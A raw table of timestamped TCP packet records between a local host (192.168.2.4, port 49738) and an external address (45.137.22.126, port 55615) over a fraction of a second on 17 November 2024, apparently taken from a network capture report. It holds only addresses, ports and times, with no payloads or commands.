Nov 17, 2024 03:07:14.194060087 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194083929 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194118023 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194139957 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194140911 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194152117 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194205999 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194233894 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194247007 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194299936 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194330931 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194344044 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194376945 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194391012 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194400072 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194422007 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194452047 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194485903 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194499969 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194510937 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194540024 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194566965 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194585085 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194591045 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194643021 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194653034 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194700956 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194708109 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194744110 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194755077 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194756985 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194827080 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194835901 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194859028 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194916010 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194960117 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194972038 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195024967 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195075989 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195154905 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195157051 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195167065 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195190907 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195202112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195228100 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195269108 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195272923 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195283890 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195332050 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195343018 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195354939 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195379972 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195419073 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195427895 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195440054 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195461035 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195472956 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195475101 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195496082 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195518017 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195554018 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195580959 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195595026 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195641994 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195658922 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195671082 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195724964 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195749044 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195804119 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195827007 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195836067 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195847988 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195847034 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195900917 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.195909977 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.195935011 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196001053 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196012020 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196023941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196050882 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196062088 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196074963 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196115971 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196125984 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196141005 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196187019 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196194887 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196207047 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196248055 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196268082 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196274996 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196307898 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196338892 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196365118 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196377039 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196432114 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196454048 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196468115 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196494102 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196522951 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196536064 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196563959 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196609974 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196654081 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196666002 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196687937 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196698904 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196707964 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196728945 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196757078 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196816921 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196830034 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196882963 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196887970 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196899891 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196907043 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196928024 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196964979 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.196976900 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.196990013 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197025061 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197041988 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197046995 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197056055 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197110891 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197113037 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197153091 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197177887 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197207928 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197247982 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197278976 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197299004 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197336912 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197341919 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197354078 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197390079 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197424889 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197484016 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197495937 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197551966 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197561026 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197573900 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197612047 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197623968 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197637081 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197679043 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197698116 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197704077 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197726965 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197767019 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197829962 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197841883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197885036 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197887897 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197896957 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197941065 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.197962046 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.197990894 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198043108 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198054075 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198065042 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198122025 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198122978 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198164940 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198175907 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198216915 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198230028 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198240995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198261023 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198287010 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198303938 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198314905 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198347092 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198348045 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198393106 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198406935 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198445082 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198489904 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198502064 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198554993 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198568106 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198602915 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198610067 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198649883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198668957 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198699951 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198710918 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198771000 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198771000 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198782921 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198838949 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198914051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198951006 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198960066 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.198964119 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.198976994 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199016094 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.199024916 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199038982 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199095964 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.199120998 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199132919 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199171066 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199182034 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199182034 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.199233055 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.199274063 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199287891 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199357986 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199415922 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199486017 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199496984 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199608088 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199619055 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199631929 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199671984 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199740887 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199752092 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199851036 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199863911 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199877024 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.199912071 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200016975 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200028896 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200042963 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200102091 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200176001 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200186968 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200244904 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200256109 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200347900 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200391054 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200433016 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200474977 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200515032 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200584888 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200634003 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200645924 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200728893 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200742960 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200855017 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200865984 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200911045 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.200953960 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201025009 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201037884 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201102972 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201114893 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201162100 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201194048 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201262951 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201283932 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201400995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201411963 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201426029 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201447964 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201559067 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201570988 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201637030 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201709986 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201720953 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201735973 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201829910 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201842070 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201884031 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.201951981 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202003002 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202025890 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202126026 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202152967 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202167034 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202214956 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202315092 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202327013 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202363968 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202385902 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202466011 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202487946 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202558041 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202600002 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202663898 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202675104 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202738047 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202759027 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202812910 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202924967 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.202935934 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203097105 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203109026 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203219891 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203232050 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203263044 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203284979 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203344107 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203355074 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203461885 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203474045 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203507900 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203563929 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203665018 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203788042 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203807116 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203819036 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203869104 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203880072 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203958988 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.203970909 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204039097 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204050064 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204114914 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204125881 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204169035 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204180956 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204229116 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204240084 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204308987 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204319954 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204360962 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204411983 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204476118 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204488039 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204555035 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204566956 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204600096 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204612017 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204668045 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204679012 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204772949 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204785109 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204830885 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204842091 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204886913 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.204907894 CET	55615	49738	45.137.22.126	192.168.2.4
